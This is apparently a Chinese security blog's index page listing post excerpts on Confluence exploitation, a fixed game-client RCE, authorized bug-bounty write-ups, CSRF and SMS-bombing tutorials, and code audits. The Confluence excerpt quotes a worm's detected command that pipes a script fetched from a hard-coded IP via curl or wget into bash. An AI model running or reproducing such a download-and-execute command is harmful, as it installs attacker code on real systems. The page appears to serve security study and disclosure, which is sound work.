51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

白嫖帮

confluence 漏洞

confluence 漏洞

厉飞雨 阅读(15) 评论(0) 赞(3)

高危蠕虫下载命令执行(wget\&curl) 命令行 bash -c (curl -s 194.38.22.53/cf.sh||wget -q -O- 194.38.22.53/cf.sh)|bash 父进程命令行 /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.con...

【漏洞已修复】永劫无间客户端RCE漏洞

【漏洞已修复】永劫无间客户端RCE漏洞

厉飞雨 阅读(11) 评论(0) 赞(2)

0x00前言 {#0x00%E5%89%8D%E8%A8%804953} ==================================== 相信大家之前都看过我博客这篇添加了密码。距离发现这个漏洞已经一年多了, 这个漏洞现在已经修复了遂把他公开出来给大家学习一下。其实蛮简单的\~\~\~ (PS:本文单纯讲漏洞。不涉及实战利用) 0x01 正文 {#0x01...

记一次众测项目中绕过*盾拿下高危漏洞

记一次众测项目中绕过*盾拿下高危漏洞

厉飞雨 阅读(14) 评论(0) 赞(2)

0x00前言 {#0x00%E5%89%8D%E8%A8%804919} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63286-1-1.html>,未经许可禁止转载。** **注意:本次渗透为授权项目,所涉及漏洞...

记一次众测项目中APP漏洞挖掘

记一次众测项目中APP漏洞挖掘

厉飞雨 阅读(12) 评论(0) 赞(2)

0x00前言 {#0x00%E5%89%8D%E8%A8%808164} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63287-1-1.html>,未经许可禁止转载。** **注意:本次渗透为授权项目,所涉及漏洞...

【漏洞学习】挖掘CSRF漏洞

【漏洞学习】挖掘CSRF漏洞

厉飞雨 阅读(11) 评论(0) 赞(2)

0x00前言 {#0x00%E5%89%8D%E8%A8%801628} ------------------------------------ 上半年就说要写怎么挖csrf漏洞了,主要是懒....后面就忘记写了。今天正好有人问到,索性就写一篇文章出来 0x01 什么是CSRF {#0x01+%E4%BB%80%E4%B9%88%E6%98%AFCSRF7275} ---...

实战挖掘短信轰炸漏洞(Burp系列教程)

实战挖掘短信轰炸漏洞(Burp系列教程)

厉飞雨 阅读(10) 评论(0) 赞(3)

**本次教程来自YanXia,转载请注明作者信息,博客地址<http://www.535yx.cn>,感谢** 0x00 引言 {#0x00+%E5%BC%95%E8%A8%804722} -------------------------------------- 短信轰炸漏洞属于web程序中的逻辑漏洞,随着互联网技术与电子商务的不断发展与,互联网所带来的安全...

web漏洞实战讲解视频教程

web漏洞实战讲解视频教程

厉飞雨 阅读(11) 评论(0) 赞(3)

第一章:基础篇 第二章:SQL注入攻击 第三章:XSS漏洞 第四章:上传漏洞 第五章:CSRF漏洞 第六章:文件包含 第七章:验证码绕过 第八章:命令执行 第九章:其他漏洞 第十章:综合漏洞分析 ![07616-hnfkh1twvs6.png](http://static.51tbox.com/stati...

记一次代码审计拿下CNVD证书

记一次代码审计拿下CNVD证书

厉飞雨 阅读(10) 评论(0) 赞(3)

0x00前言 {#0x00%E5%89%8D%E8%A8%803265} ==================================== **本篇文章作者YanXia,本文属i春秋原创奖励计划,未经许可禁止转载。地址<https://bbs.ichunqiu.com/thread-63302-1-1.html>** 去年的时候,想给学弟刷一点CNV...

代码审计之YXCMS

代码审计之YXCMS

厉飞雨 阅读(13) 评论(0) 赞(3)

**本次教程来自YanXia,转载请注明作者信息,博客地址<http://www.535yx.cn>,感谢** 0x00 前言 {#0x00+%E5%89%8D%E8%A8%804209} ====================================== 好久没写审计文章了,今天更新篇入门级别MVC架构的PHP代码审计文章。 YXCMS v1.4...